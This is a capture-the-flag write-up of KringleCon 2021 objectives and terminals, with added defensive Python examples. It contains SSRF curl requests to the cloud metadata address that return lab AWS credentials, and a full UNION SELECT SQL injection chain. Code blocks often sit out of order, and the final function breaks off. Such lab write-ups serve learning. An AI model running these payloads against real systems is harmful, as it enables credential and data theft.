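From the defender's side, the fix for a field like inputWorkSample is to validate the submitted URL before the server fetches it. The following added Python check (not code from this report or from the Jack Frost Tower site) rejects non-HTTP(S) schemes, embedded credentials, and any destination that resolves into loopback, private or link-local space, which covers 169.254.169.254 and its IPv4-mapped IPv6 form; the resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Destinations a "fetch the applicant's public report" feature must never reach:
# loopback, RFC 1918, link-local (which contains the IMDS address 169.254.169.254),
# the unspecified range, and their IPv6 counterparts including IPv4-mapped addresses.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "::/128", "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]


def resolve_all(host):
    """Default resolver: every A/AAAA address the name maps to. getaddrinfo also
    normalises shorthand forms such as a bare decimal IP, so those get checked too."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_fetch_url(url, resolve=resolve_all):
    """Return (ok, reason). Only http/https, no embedded credentials, and every address the
    host maps to must lie outside BLOCKED_NETWORKS; a single bad address rejects the URL,
    which also defeats names that mix public and internal records."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = {str(ipaddress.ip_address(host))}   # literal IPv4 or IPv6 address
    except ValueError:
        try:
            addrs = resolve(host)                    # hostname: check what it resolves to
        except OSError:
            return False, f"cannot resolve {host!r}"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if any(ip in net for net in BLOCKED_NETWORKS):
            return False, f"{host} -> {addr} is in a blocked range"
    return True, "ok"


if __name__ == "__main__":
    # The IMDS URL that was submitted in the inputWorkSample field is rejected outright.
    print(is_safe_fetch_url("http://169.254.169.254/latest/meta-data/iam/security-credentials"))
```

Because DNS answers can change between the check and the fetch, the fetcher should connect to the address that was validated rather than re-resolving the name; on AWS, requiring IMDSv2 (session-token based) on the instance further limits what a simple GET-based SSRF can reach.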
linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?inputName=test&inputEmail=test@test.com&inputPhone=test&inputField=Anti-social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/images/test.jpg
dynamic
meta-data
Now we can retrieve the credentials using one final query.
Inputting the SecretAccessKey value found from this query solves the objective and you are awarded the SSRF to
IMDS to S3 Bucket Access achievement.
2.11 Objective 11 – Customer Complaint Analysis
This objective requires us to search a PCAP file for information for HTTP requests that help us answer our question.
Tinsel Upatree in the kitchen gives us some hints if we solve the strace-ltrace-retrace terminal.
The following hints are given for this objective after solving the associated terminal:
• Evil Bit RFC – RFC3513 defines the usage of the “Evil Bit” in IPv4 headers.
• Wireshark Display Filters – Different from BPF capture filters, Wireshark’s display filters can find text with
the contains keyword – and evil bits with ip.flag.rb.
linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?inputName=test&inputEmail=test@test.com&inputPhone=test&inputField=Anti-social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-credentials&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/images/test.jpg
jf-deploy-role
linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?inputName=test&inputEmail=test@test.com&inputPhone=test&inputField=Anti-social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/images/test.jpg
{
"Code": "Success",
"LastUpdated": "2021-05-02T18:50:40Z",
"Type": "AWS-HMAC",
"AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
"SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
"Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
"Expiration": "2026-05-02T18:50:40Z"
}
After looking over the PCAP, we find that complaints are submitted using HTTP to
frost-tower.local/feedback/guest_complaints. If we use the following filter, looking for POSTs to the complaint
website without the “Evil Bit” set, we find information for the human who filed a complaint and accessed the JF
Tower network with a non-compliant host:
We find the following attributes:
• Name: “Muffy VonDuchess Sebastian”
• Guest Info: Room 1024
• Troll ID: “ I don’t know. There were several of them”
• Description: “I have never, in my life, been in a facility with such horrible staff. They are rude and insulting.
What kind of place is this? You can be sure that I (or my lawyer) will be speaking directly with Mr. Frost!”
With this information we can modify our filter to look for packets with the “Evil Bit” set and for complaints
associated with Room 1024, as room numbers are often included in the guest_info form field.
This gives us the answer of Flud, Hagg, and Yaqh. Typing this answer into the textbox on our badge under Objective 11
earns us the Reading Evil Packets achievement.
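The two Wireshark filters used above (reserved bit clear or set, HTTP POST to the complaint form, guest_info mentioning the room), expressed as an added Python example that is not part of the report: a small parser over raw IPv4/TCP/HTTP bytes. All packets are constructed here; the form field names name, guest_info and troll_id are assumptions.

```python
import struct
from urllib.parse import parse_qs

# Added example, not from the report. It mirrors the two Wireshark filters
# (ip.flags.rb == 0/1, HTTP POST containing "complaint", guest_info contains
# "1024") as a small parser over raw IPv4/TCP/HTTP bytes. Every packet below is
# constructed here; only the field names name/guest_info/troll_id are assumed.

def build_packet(src, body, evil):
    """Constructed IPv4 + TCP + HTTP POST to the complaint form. `evil` sets the
    reserved (RFC 3514 "evil") bit, bit 15 of the flags/fragment-offset word."""
    payload = ("POST /feedback/guest_complaints HTTP/1.1\r\n"
               "Host: frost-tower.local\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n"
               f"Content-Length: {len(body)}\r\n\r\n{body}").encode()
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 512, 0, 0)
    flags_frag = 0x8000 if evil else 0x0000
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0x1234, flags_frag, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes([10, 0, 0, 1]))
    return ip + tcp + payload

def parse_packet(pkt):
    """Return source IP, evil-bit state and TCP payload of an IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    flags_frag = struct.unpack_from("!H", pkt, 6)[0]
    if pkt[9] != 6:  # not TCP
        return None
    src = ".".join(str(b) for b in pkt[12:16])
    tcp = pkt[ihl:]
    data_off = (tcp[12] >> 4) * 4
    return {"src": src, "evil": bool(flags_frag & 0x8000), "payload": tcp[data_off:]}

def complaint_form_fields(payload):
    """Decode an HTTP POST to a URL containing 'complaint'; None otherwise."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, sep, body = text.partition("\r\n\r\n")
    method, _, rest = head.partition(" ")
    path = rest.split(" ", 1)[0]
    if not sep or method != "POST" or "complaint" not in path:
        return None
    return {k: v[0] for k, v in parse_qs(body).items()}

def find_complaints(packets, evil_bit, room=None):
    """Equivalent of the report's filters: POSTs to the complaint form whose
    reserved bit equals `evil_bit`, optionally only those whose guest_info
    mentions `room`."""
    hits = []
    for pkt in packets:
        p = parse_packet(pkt)
        if p is None or p["evil"] != evil_bit:
            continue
        fields = complaint_form_fields(p["payload"])
        if fields is None:
            continue
        if room is not None and room not in fields.get("guest_info", ""):
            continue
        hits.append((p["src"], fields))
    return hits

SAMPLE_PACKETS = [  # constructed capture: one human complaint, trolls with the bit set
    build_packet("10.0.0.5", "name=Muffy+VonDuchess+Sebastian&guest_info=Room+1024&troll_id=several", False),
    build_packet("10.0.0.21", "name=Flud&guest_info=1024&troll_id=Flud", True),
    build_packet("10.0.0.22", "name=Hagg&guest_info=1024&troll_id=Hagg", True),
    build_packet("10.0.0.23", "name=Yaqh&guest_info=1024&troll_id=Yaqh", True),
    build_packet("10.0.0.24", "name=Grunt&guest_info=Room+7&troll_id=Grunt", True),
]

if __name__ == "__main__":
    for src, fields in find_complaints(SAMPLE_PACKETS, evil_bit=False):
        print("human:", src, fields["name"], fields["guest_info"])
    for src, fields in find_complaints(SAMPLE_PACKETS, evil_bit=True, room="1024"):
        print("troll:", src, fields["name"])
```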
2.12 Objective 12 – Frost Tower Website Checkup
This objective is the first of the final two objectives. It requires using source code to bypass the authentication of a
website and then to use SQL injection to retrieve data from a table. Ribb Bonbowford, in Santa’s dining room, will
offer some hints after solving The Elf Code game terminal.
We are given the following hint to help us with our task.
• SQL Injection with Source – When you have the source code, API documentation becomes tremendously
valuable.
After looking over the API documents, the first issue we find is an OWASP Top 10 vulnerability: Broken
Authentication (Identification and Authentication Failures). We can see a logic flaw in the code below, which assigns a
session token if the user enters an email that already exists into the contact form.
ip.flags.rb==0 && http contains complaint && http.request.method==POST
ip.flags.rb==1 && http contains complaint && http.request.method==POST && urlencoded-form.value contains "1024"
var rowlength = rows.length;
if (rowlength >= "1"){
    session = req.session;
    session.uniqueID = email;
    req.flash('info', 'Email Already Exists');
    res.redirect("/contact");
}
This means that, after we enter an email address that already exists into the contact form, we can access the dashboard,
where we can search data and view account details, without ever authenticating. This is important because,
examining the source code, we find a flaw in the detail logic of the /detail/:id endpoint: SQL text is accepted
unfiltered from the user and appended to the query as text rather than bound as a parameter.
This flaw means that we can inject code in the URL, but there is a catch: because of the split(',') call, we will
not be able to use commas in the payload.
We also know from the review of the source code and API docs that the backend is MySQL. Let’s build a UNION SELECT
SQL injection, first working out how many columns we need.
We get an error when we get to 8, so we have seven columns to work with; probably not all of them are shown in the
interface. Let’s now build a UNION SELECT query selecting only NULLs so we know it is working.
We get the following result:
Now that we have a working query we can start browsing the database to find the data we need to view. We will list
all the schemas, then list all tables in the correct schema, then all the columns in the correct table, then view the
appropriate columns in the correct table. Note that some of this information is available in the source code as well.
Schemas/Databases:
Results
if (reqparam.indexOf(',') > 0){
    var ids = reqparam.split(',');
    reqparam = "0";
    for (var i=0; i<ids.length; i++){
        query += tempCont.escape(m.raw(ids[i]));
        query += " OR id="
    }
    query += "?";
}else{
    query = "SELECT * FROM uniquecontact WHERE id=?"
}
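The /detail/:id flaw and its fix, as an added Python example that is not the site’s code: SQLite stands in for the MySQL backend, the tables and rows are constructed, and the vulnerable builder reproduces the raw concatenation shown above (escape(raw(x)) leaves x untouched and node-mysql substitutes the trailing placeholder textually, so the bound "0" simply becomes part of the string). The hardened version validates the id list and binds every id.

```python
import re
import sqlite3

# Added example, not the site's code. SQLite stands in for the report's MySQL
# backend; the tables, rows and todo notes are constructed here.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE uniquecontact(id INTEGER PRIMARY KEY, name TEXT, email TEXT);
        CREATE TABLE todo(id INTEGER PRIMARY KEY, note TEXT, completed INTEGER);
        INSERT INTO uniquecontact VALUES (13, 's', 'email@email.com'), (14, 'abc', 'abc@abc.com');
        INSERT INTO todo VALUES (1, 'constructed note one', 0), (2, 'constructed note two', 0);
    """)
    return db

def detail_vulnerable(db, reqparam):
    """Model of the /detail/:id logic: with a comma in the parameter each piece is
    appended to the SQL as raw text. The original binds "0" to a trailing '?'
    that node-mysql substitutes textually, so a literal 0 is written here."""
    if "," in reqparam:
        query = "SELECT * FROM uniquecontact WHERE id="
        for part in reqparam.split(","):
            query += part + " OR id="
        query += "0"
        return db.execute(query).fetchall()
    return db.execute("SELECT * FROM uniquecontact WHERE id=?", (reqparam,)).fetchall()

ID_LIST = re.compile(r"^\d+(,\d+)*$")

def detail_hardened(db, reqparam):
    """Accept only comma-separated integers and bind every id as a parameter."""
    if not ID_LIST.match(reqparam):
        raise ValueError("detail id must be one or more comma-separated integers")
    ids = [int(x) for x in reqparam.split(",")]
    placeholders = ",".join("?" * len(ids))
    return db.execute(f"SELECT * FROM uniquecontact WHERE id IN ({placeholders})", ids).fetchall()

def hardened_rejects(db, reqparam):
    """True when the hardened handler refuses the parameter."""
    try:
        detail_hardened(db, reqparam)
    except ValueError:
        return True
    return False

# The report's comma-free payload shape, with three columns instead of seven
# because the stand-in table has three.
PAYLOAD = ("13,14 union select * from (select NULL)a join (select note from todo)b "
           "join (select NULL)c --")

def leaked_notes(db):
    """Todo notes that the vulnerable endpoint returns alongside the contacts."""
    return sorted(row[1] for row in detail_vulnerable(db, PAYLOAD) if row[0] is None)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leaked_notes(db))
    print("hardened 13,14:", detail_hardened(db, "13,14"))
    print("hardened rejects payload:", hardened_rejects(db, PAYLOAD))
```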
https://staging.jackfrosttower.com/detail/13,14 order by 8 --
https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select NULL)c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
[Screenshot of the detail page: records 13 (s / email@email.com / 123456) and 14 (abc / abc@abc.com / 123 / Algeria) with their dates, followed by the extra row produced by the union, in which only the two date columns are populated.]
https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select schema_name from information_schema.schemata)c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
• information_schema
• encontact
Tables in the encontact Database
Results
• users
• todo
• emails
• uniquecontact
Columns in Todo Table
Results
• id
• note
• completed
Get Notes from ToDo Table
Results
• Buy up land all around Santa’s Castle
• Build bigger and more majestic tower next to Santa’s
• Erode Santa’s influence at the North Pole via FrostFest, the greatest Con in history
• Dishearten Santa’s elves and encourage defection to our cause
• Steal Santa’s sleigh technology and build a competing and way better Frosty present delivery vehicle
• Undermine Santa’s ability to deliver presents on 12/24 through elf staff shortages, technology glitches, and assorted mayhem
• Force Santa to cancel Christmas
• SAVE THE DAY by delivering Frosty presents using merch from the Frost Tower Gift Shop to children world-wide...so the whole world sees that Frost saved the Holiday Season!!!! Bwahahahahaha!
• With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him
After retrieving this data, we have the answer we need. Entering the word clerk into the badge under Objective 12
completes the challenge and gives us the Frost Tower Website Checkup achievement.
2.13 Objective 13 – FPGA Programming
In this final challenge, we are tasked with writing a Verilog module that outputs tones of given frequencies as a
square wave.
https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select table_name from information_schema.tables where table_schema = "encontact")c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select column_name from information_schema.columns where table_name = "todo")c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select note from encontact.todo)c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
We are given the following hints to help us along the way by Grody Goiterson:
• FPGA Talk - Prof. Qwerty Petabyte is giving a lesson about Field Programmable Gate Arrays (FPGAs).
• FPGA for Fun – There are FPGA enthusiast sites.
The following code solves this challenge for all required frequencies. One hint that should have been given is that, if
you have a reset, you need to take the leading edge of the wave into account and start the count one lower than you
would when counting up without a reset.
After finishing the code and successfully running through all the tests, you can press the Program Device button to
finish the final objective of Kringlecon 2021. You are awarded the FPGA Programming achievement and are given an
FPGA, which allows you to finish the game/narrative.
2.14 End Game
After finishing the last objective, you are given an FPGA. You can plug it into the Speak & Spell on the table
near Crunchy Squisher, the device she is building on the rooftop of Jack Frost Tower. When the FPGA is plugged
in, music plays, a spaceship descends and you are awarded the Open the Spaceship’s Door achievement. You can
module tone_generator (
    input clk,
    input rst,
    input [31:0] freq,
    output wave_out
);
    reg [31:0] counter;
    reg [31:0] top;
    reg tone;
    real limit = 125000000.0/(freq*2/100); // get a real number with the correct endpoint for loop
    assign wave_out = tone;

    always @(posedge clk or posedge rst)
    begin
        counter <= 0;
        if(rst==1)
        begin
            counter <= -1; // take into account the leading edge on reset
            tone <= 0;
        end
        else
            if($rtoi(limit * 10) - ($rtoi(limit) * 10) > 4) // round real to integer correctly
                top <= $rtoi(limit) + 1;
            else
                top <= $rtoi(limit);
        begin
            if(counter >= top)
            begin
                counter <= 1;
                tone <= tone ^ 1'b1; // toggle tone between 1 and 0
            end
            else
                counter <= counter + 1; // increment counter every n clock cycles
        end
    end
endmodule
enter the spaceship and explore the dialog options of the characters from right to left. When you finish the dialog with
Santa you are awarded the You Won! achievement and the credits roll.
3 Terminals
3.1 Exif Metadata
Talking to Piney Sappington and opening the terminal, we find that we need to use exiftool to find out which of a
number of Word .docx files has been modified.
Using the exiftool man page as a reference and looking at a handful of documents in the directory, there is a good
chance that we will find our answer in the Last Modified By metadata tag. We can show this tag for all documents
at once by running exiftool -LastModifiedBy *.
Entering 2021-12-21.docx at the Filename (including .docx extension) > prompt solves the terminal and gives us the
Document Analysis achievement. It also unlocks the three hints used for Objective 2, Where in the World
is Caramel Santaigo?
3.2 Grepping for Gold
This challenge requires you to answer a number of questions by searching a grepable nmap output file with grep. The
following hint is given by Greasy GopherGuts if you talk to him prior to completing the challenge:
• Grep Cheat Sheet – Check this out if you need a grep refresher.
1. What port does 34.76.1.22 have open?
Answer: Port 62078
elf@04b8e74236db:~$ exiftool -LastModifiedBy *
…
======= 2021-12-20.docx
Last Modified By : Santa Claus
======= 2021-12-21.docx
Last Modified By : Jack Frost
======= 2021-12-22.docx
Last Modified By : Santa Claus
…
25 image files read
elf@04b8e74236db:~$
HELP! That wily Jack Frost modified one of our naughty/nice records, and right
before Christmas! Can you help us figure out which one? We’ve installed exiftool
for your convenience!
Filename (including .docx extension) >
Howdy howdy! Mind helping me with this homew- er, challenge?
Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.
The quizme program has the questions and hints and, incidentally,
has NOTHING to do with an Elf University assignment. Thanks!
Answer all the questions in the quizme executable:
- What port does 34.76.1.22 have open?
- What port does 34.77.207.226 have open?
- How many hosts appear "Up" in the scan?
- How many hosts have a web port open? (Let's just use TCP ports 80, 443, and 8080)
- How many hosts with status Up have no (detected) open TCP ports?
- What's the greatest number of TCP ports any one host has open?
Check out bigscan.gnmap and type quizme to answer each question.
2. What port does 34.77.207.226 have open?
Answer: Port 8080
3. How many hosts appear “Up” in the scan?
Answer: 26054
4. How many hosts have a web port open? (Let’s just use TCP ports 80, 443, and 8080)
Answer: 14372
5. How many hosts with status Up have no (detected) open TCP ports?
Answer: 402
6. What’s the greatest number of TCP ports any one host has open?
Answer: 12
After answering all the questions correctly, you earn the Grepping for Gold! achievement and hints for Objective 3
from Greasy GopherGuts.
3.3 Logic Munchers
There are two ways to solve this game and Noel Boetie gives us the following hints:
• Boolean Logic – There are lots of special symbols for logic and set notation. This one covers AND, NOT,
and OR at the bottom.
• AND, OR, NOT, XOR – This might be a handy reference too.
You can either play the game and complete an Intermediate stage in Potpourri or higher, or you can tweak the
JavaScript code of the game to automatically win each stage. There are a few ways to do this. First, we can change
the code in Chompy.js so we don’t lose lives if we eat the wrong expression.
Under the Chompy class, we can change the die() function to add a life instead of removing one when we die or eat a
false expression.
elf@3b10b69e686d:~$ grep 34.76.1.22 bigscan.gnmap
Host: 34.76.1.22 () Status: Up
Host: 34.76.1.22 () Ports: 62078/open/tcp//iphone-sync/// Ignored State: closed (999)
elf@3b10b69e686d:~$ grep 34.77.207.226 bigscan.gnmap
Host: 34.77.207.226 () Status: Up
Host: 34.77.207.226 () Ports: 8080/open/tcp//http-proxy/// Ignored State: filtered (999)
elf@3b10b69e686d:~$ grep Up bigscan.gnmap | cut -f 2 -d ' ' | sort | uniq | wc -l
26054
elf@3b10b69e686d:~$ grep -E '\s80/open|\s443/open|\s8080/open' bigscan.gnmap | wc -l
14372
elf@23d6ee396138:~$ expr `echo $(grep Up bigscan.gnmap | wc -l) - $(grep Ports: bigscan.gnmap | wc -l)`
402
elf@23d6ee396138:~$ grep -o -E 'Ports:.*///\s' bigscan.gnmap | grep -o -n 'open' | uniq -c | sort | tail -1
12 5886:open
This change allows us to quickly pass each level by eating any expression until all the true expressions are removed.
We can also set the sleep time to 0 so we don’t have to wait two seconds after each death. The easiest way to
beat this challenge is to change the logic of the function that checks whether a stage has any remaining true
statements. We can do this by changing if (!workToDo) to if (workToDo). Upon saving this change in Chrome
Developer Tools, each stage is won immediately upon entering.
Due to the number of expressions, winning the game legitimately will not be covered in this assessment, but those
unfamiliar with these types of boolean expressions should play the game rather than circumvent it. The
Logic Munchers achievement is awarded for completing this terminal, and Noel Boetie gives you hints for Objective 4.
3.4 IPv6 Sandbox
The objective of this challenge is to find the password for a candy striper. The candy striper is on a system on an IPv6
network, and the password is served by a web service on another host on that network. We must use commands such as
netcat, nmap, ping, and curl to find the correct IP address and obtain the password. Jewel Loggins gives us a single hint
for this challenge.
• IPv6 Reference – Check out this Github Gist with common tools used in an IPv6 context
The first thing we will do is to find other link local addresses for computers in our network segment. We can do this
using the following command.
...
die() { // when a player eats the wrong thing or gets eaten
lives += 1; //reduce life count (increase life count)
...
chompySleepTime = new Date().getTime() + 0 // set wake time 2 sec in future
...
...
function checkWin() // check to see if the stage has been won
...
if (workToDo) // work’s all done? Stage up!
...
Tools:
* netcat
* nmap
* ping / ping6
* curl
Welcome, Kringlecon attendee! The candy striper is running as a service on
this terminal, but I can’t remember the password. Like a sticky note under the
keyboard, I put the password on another machine in this network. Problem is: I
don’t have have the IP address of that other host.
Please do what you can to help me out. Find the other machine, retrieve the
Password, and enter it into the Candy Striper in the pane above. I know you
Can get it running again!
elf@9e1d8554e176:~$ ping6 -c2 ff02::1
PING ff02::1(ff02::1) 56 data bytes
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from fe80::42:d7ff:fe9d:1bd%eth0: icmp_seq=1 ttl=64 time=0.035 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a002%eth0: icmp_seq=1 ttl=64 time=0.035 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 18ms
rtt min/avg/max/mdev = 0.035/0.053/0.077/0.018 ms
Examining our local system, we see that c0ff:fea8:a003 is our own address, so two of the listed IPv6 addresses belong
to us. We can scan the other two with nmap to see what services are running on them.
Next we use curl to retrieve the page on port 80 of the a002 address, since this is the only host that appears to be
hosting any web services.
Okay. Let’s connect to the other open port with curl to get the striper’s activation phrase.
Now we have the correct phrase to engage the candy striper and can enter it in the answer screen.
Entering the correct phrase solves the challenge. We then receive the hints from Jewel Loggins for Objective 5 and
the IPv6 Sandbox achievement.
3.5 Holiday Hero
This terminal is a Guitar Hero style game. In order to complete the achievement for this game you must get over 80%
fuel into the sleigh. You can do this by playing a two-player game as the primary player on the left, or by
enabling single-player mode and filling the sleigh over 80% on your own. There is only one hint, given by Chimney
Scissorsticks, and it does not persist in the badge hint area. The hint is as follows:
elf@9e1d8554e176:~$ curl http://[fe80::42:c0ff:fea8:a002]:80/ --interface eth0
<html>
<head><title>Candy Striper v6</title></head>
<body>
<marquee>Connect to the other open TCP port to get the striper’s activation phrase!</marquee>
</body>
</html>
elf@9e1d8554e176:~$ curl http://[fe80::42:c0ff:fea8:a002]:9000/ --interface eth0
PieceOnEarth
ENTER THE CORRECT PHRASE TO ENGAGE THE CANDY STRIPER
> PieceOnEarth
Your answer: PieceOnEarth
Checking…
CANDY STRIPER REENGAGED. THANK YOU!
elf@9e1d8554e176:~$ nmap -6 -T 5 --top-ports 250 fe80::42:d7ff:fe9d:1bd%eth0
Starting Nmap 7.70 (https://nmap.org) at 2022-01-03 18:04 UTC
Nmap scan report for fe80::42:d7ff:fe9d:1bd
Host is up (0.000087s latency).
Not shown: 248 closed ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds
elf@9e1d8554e176:~$ nmap -6 -T 5 --top-ports 250 fe80::42:c0ff:fea8:a002
Starting Nmap 7.70 (https://nmap.org) at 2022-01-03 18:04 UTC
Nmap scan report for fe80::42:c0ff:fea8:a002
Host is up (0.000091s latency).
Not shown: 248 closed ports
PORT STATE SERVICE
80/tcp open http
9000/tcp open cslistener
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds
• Untitled Hint – There’s a clever way to enable single player mode. It can be enabled by fiddling with two
client-side values. One of which is passed on to the server.
The first value can be found when examining the application cookies. The cookie is HOHOHO and it has the value
%7B%22single_player%22%3Afalse%7D. We must change this cookie to %7B%22single_player%22%3Atrue%7D.
After changing the cookie and entering the room, you can start playing the game by yourself, but the buttons for the
other player do not get pressed automatically as they should. To remedy this, we also have to set the
JavaScript variable single_player_mode to true before we start the game. This can be done by going to Sources
→ Console, selecting hero.kringlecastle.com as the context and then typing single_player_mode=true in the console
window after creating a room but before you begin playing the game. This was done by setting a breakpoint on the
first line shown below.
You can now play the game and the player two buttons will automatically be counted as correct and animations will
play during the game showing that they are being counted as correct.
After doing this and completing the game as a single player, you will receive the Holiday Hero achievement.
3.6 HoHo...No
In this challenge, you are asked to configure fail2ban with custom rules. This requires you to create a
fail2ban filter file, a jail file and an action file. The instructions for this terminal are shown below.
The first thing we should do is filter the log file to find the common types of failure messages so we can build our patterns.
This can be done using standard Linux tools.
Now that we have patterns for the log lines we are looking for, let’s start by developing our filter file. This file lives in
the fail2ban /etc directory under filter.d/santa.conf and matches all of the log lines for the patterns we are interested in.
Next we add the actions for what we want fail2ban to do when we find an IP address that has violated our rules. This goes
in the fail2ban /etc directory under action.d/santa.conf.
Finally, we need to develop a custom jail that tells fail2ban where to find our log file, filter and action, and that sets
the detection window, threshold and ban/unban times. That file is located in the fail2ban /etc directory under
jail.d/santa.conf.
Jack is trying to break into Santa’s workshop!
Santa’s elves are working 24/7 to manually look through logs, identify the
malicious IP addresses, and block them. We need your help to automate this
so the elves can get back to making presents!
Can you configure Fail2Ban to detect and block the bad IPs?
* You must monitor for new log entries in /var/log/hohono.log
* If an IP generates 10 or more failure messages within an hour then it must
be added to the naughty list by running naughtylist add <ip>
/root/naughtylist add 12.34.56.78
* You can also remove an IP with naughtylist del <ip>
/root/naughtylist del 12.34.56.78
* You can check which Ips are currently on the naughty list by running
/root/naughtylist list
You’ll be rewarded if you correctly identify all the malicious IPs with a
Fail2Ban filter in /etc/fail2ban/filter.d, and action to ban and unban in
/etc/fail2ban/action.d, and a custom jail in /etc/fail2ban/jail.d. Don’t
add any nice IPs to the naughty list!
*** IMPORTANT NOTE! ***
Fail2Ban won’t rescan any logs it has already seen. That means it won’t
automatically process the log file each time you make changes to the Fail2Ban
config. When needed, run /root/naughtylist refresh to re-sample the log file
And tell Fail2Ban to reproccess it.
root@fe3682bbf503:~# cat /var/log/hohono.log | grep -v success | grep -v Valid | cut -f 3- -d ' ' | sed -E 's/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/x.x.x.x/g' | sed -E 's/alpha|bravo|charlie|delta/xxxxxx/g' | sed -E 's/for [a-z]+/for xxxxxx/g' | sort | uniq
Failed login from x.x.x.x for xxxxxx
Invalid heartbeat ‘xxxxxx’ from x.x.x.x
Login from x.x.x.x rejected due to unknown user name
x.x.x.x sent a malformed request
[Definition]
failregex = ^.* <HOST> sent a malformed request$
            ^.* Login from <HOST> rejected due to unknown user name$
            ^.* Invalid heartbeat '\w+' from <HOST>$
            ^.* Failed login from <HOST> for \w+$
[Definition]
actionstart=/root/naughtylist refresh
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>
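The filter, the findtime/maxretry window of the jail and the ban action, modelled in plain Python as an added example that is not fail2ban’s own code, run over constructed hohono.log lines. The "YYYY-MM-DD HH:MM:SS message" line layout is an assumption (the report strips two leading fields with cut -f 3-), and the two banned IPs are taken from the naughtylist output below; the other addresses are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Added example, not fail2ban itself: a plain-Python model of filter.d/santa.conf,
# the findtime/maxretry window of the jail, and the ban action, run over
# constructed hohono.log lines. The "YYYY-MM-DD HH:MM:SS message" line layout
# is assumed (the report strips two leading fields with cut -f 3-).
HOST = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
FAILREGEX = [re.compile(p) for p in (
    rf"^.* {HOST} sent a malformed request$",
    rf"^.* Login from {HOST} rejected due to unknown user name$",
    rf"^.* Invalid heartbeat '\w+' from {HOST}$",
    rf"^.* Failed login from {HOST} for \w+$",
)]
FINDTIME = timedelta(hours=1)   # findtime = 1h
MAXRETRY = 10                   # maxretry = 10

def parse_failure(line):
    """(timestamp, ip) when a line matches one of the failregex patterns, else None."""
    for rx in FAILREGEX:
        m = rx.match(line)
        if m:
            return datetime.strptime(line[:19], "%Y-%m-%d %H:%M:%S"), m.group("host")
    return None

def naughty_ips(lines):
    """Ban an IP once it has MAXRETRY or more failures inside one FINDTIME window."""
    recent = defaultdict(deque)
    banned = []
    for line in lines:
        hit = parse_failure(line)
        if hit is None:
            continue
        ts, ip = hit
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > FINDTIME:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= MAXRETRY and ip not in banned:
            banned.append(ip)        # here fail2ban would run: /root/naughtylist add <ip>
    return banned

def _series(ip, start, count, step, template):
    """Constructed log lines for one IP, `count` of them `step` apart."""
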